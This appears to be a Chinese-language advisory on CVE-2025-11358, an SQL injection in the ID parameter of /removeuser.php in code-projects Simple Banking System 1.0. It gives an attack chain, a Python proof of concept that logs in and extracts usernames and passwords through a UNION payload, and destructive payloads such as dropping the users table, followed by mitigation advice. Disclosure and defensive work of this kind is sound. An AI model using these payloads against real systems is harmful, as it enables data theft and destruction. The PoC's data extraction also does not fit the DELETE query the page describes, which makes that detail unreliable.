CVE-2025-11358：Simple Banking System SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-11358

漏洞类型

SQL注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

code-projects Simple Banking System

漏洞概述

CVE-2025-11358是code-projects公司开发的Simple Banking System（简易银行管理系统）1.0版本中存在的一个SQL注入安全漏洞。该漏洞于2025年10月7日被公开披露，CVSS 3.1评分为6.3分，属于中等严重等级。漏洞存在于系统的/removeuser.php文件中，具体位于对用户删除功能的处理逻辑中。攻击者可以通过操控该文件中的ID参数注入恶意的SQL语句，从而实现对后台数据库的未授权操作。由于该系统是一款面向小型银行或金融机构的业务管理系统，存储了大量用户的敏感金融数据，包括账户信息、交易记录和个人身份信息等，因此该漏洞一旦被利用，可能导致用户数据泄露、账户信息被篡改甚至系统数据被恶意删除等严重后果。该漏洞的攻击向量为网络（AV:N），攻击复杂度低（AC:L），仅需要低权限认证（PR:L），无需用户交互（UI:N），对机密性、完整性和可用性均存在低程度影响。值得注意的是，该漏洞的利用代码已经被公开发布，意味着任何具备基本攻击技能的人都可能利用此漏洞对未打补丁的系统发起攻击，安全风险较高。

技术细节

该漏洞的根源在于/removeuser.php文件在处理用户删除请求时，未对用户提交的ID参数进行充分的输入验证和参数化处理，而是直接将用户输入拼接到SQL查询语句中执行。这种编程模式是典型的SQL注入漏洞成因。具体而言，当系统接收到删除用户的请求时，会构造类似如下的SQL语句：DELETE FROM users WHERE id = [用户输入的ID]。如果攻击者在ID参数中注入恶意SQL片段，例如将参数设置为 "1 OR 1=1" 或 "1; DROP TABLE users--" 等形式，数据库引擎将执行攻击者构造的恶意SQL逻辑。在第一种情况下，系统将删除所有用户记录；在第二种情况下，攻击者甚至可以删除整个用户表。由于该漏洞的攻击复杂度低（AC:L），且仅需要低权限认证（PR:L），这意味着即使是普通用户账户也可能利用此漏洞进行攻击。攻击者可以通过构造特殊的HTTP请求（如GET或POST方式）向/removeuser.php端点发送包含恶意SQL代码的ID参数，服务器在未进行适当过滤的情况下将恶意查询传递给数据库执行，最终实现数据窃取、数据篡改或权限提升等攻击目标。

攻击链分析

STEP 1

步骤1：信息收集

攻击者首先识别目标系统为code-projects Simple Banking System 1.0版本，并定位到存在漏洞的/removeuser.php端点。

STEP 2

步骤2：获取低权限凭证

由于漏洞利用仅需要低权限认证（PR:L），攻击者通过注册、钓鱼或购买等方式获取系统的普通用户账户凭证。

STEP 3

步骤3：构造恶意SQL注入载荷

攻击者针对/removeuser.php的ID参数构造恶意SQL注入载荷，如使用UNION查询注入、布尔盲注或时间盲注等技术。

STEP 4

步骤4：发送恶意请求

攻击者通过认证会话向/removeuser.php发送包含恶意ID参数的HTTP请求，触发后端数据库执行恶意SQL语句。

STEP 5

步骤5：数据窃取或破坏

成功利用漏洞后，攻击者可以窃取数据库中的敏感信息（如用户凭证、金融数据），或执行数据篡改、删除等破坏性操作。

STEP 6

步骤6：权限提升与持久化

攻击者可能通过获取管理员凭证或植入后门，实现权限提升并在系统中建立持久化访问。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-11358 PoC - SQL Injection in Simple Banking System
# Vulnerable endpoint: /removeuser.php
# Vulnerable parameter: ID

import requests

# Target configuration
TARGET_URL = "http://target-site.com"
LOGIN_URL = f"{TARGET_URL}/login.php"
REMOVE_USER_URL = f"{TARGET_URL}/removeuser.php"
USERNAME = "attacker_user"
PASSWORD = "attacker_password"

# Step 1: Authenticate to obtain a valid session (low privilege required)
session = requests.Session()
login_data = {
    "username": USERNAME,
    "password": PASSWORD,
    "login": "submit"
}
session.post(LOGIN_URL, data=login_data)

# Step 2: Exploit SQL Injection via ID parameter in removeuser.php
# Malicious payload to extract database information using UNION-based injection
malicious_id = "1 UNION SELECT 1,username,password,4 FROM users-- -"

payload = {
    "ID": malicious_id
}

# Step 3: Send the malicious request
response = session.get(REMOVE_USER_URL, params=payload)

# Step 4: Analyze the response for leaked data
if response.status_code == 200:
    print("[+] SQL Injection successful!")
    print("[+] Response content:")
    print(response.text)
else:
    print(f"[-] Request failed with status code: {response.status_code}")

# Alternative: Boolean-based blind SQL injection payload
# malicious_id = "1 AND 1=1"  # True condition
# malicious_id = "1 AND 1=2"  # False condition

# Alternative: Time-based blind SQL injection payload
# malicious_id = "1; SELECT SLEEP(5)-- -"

影响范围

code-projects Simple Banking System 1.0

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1）对/removeuser.php文件中的ID参数实施严格的输入验证，仅允许数字类型输入；2）在Web服务器层面部署WAF规则，拦截常见的SQL注入载荷；3）限制数据库账户权限，禁止执行DROP、DELETE等高危操作；4）监控系统日志，对异常的数据库查询行为设置告警；5）暂时禁用/removeuser.php功能或限制其访问权限，仅允许可信IP访问。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-11358
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-11358
3 Details https://www.cvedetails.com/cve/CVE-2025-11358/
4 VulDB https://vuldb.com/cve/CVE-2025-11358
5 Link https://code-projects.org/
6 Link https://github.com/QuJun1/cve/issues/2
7 Link https://vuldb.com/?ctiid.327245
8 Link https://vuldb.com/?id.327245
9 Link https://vuldb.com/?submit.664963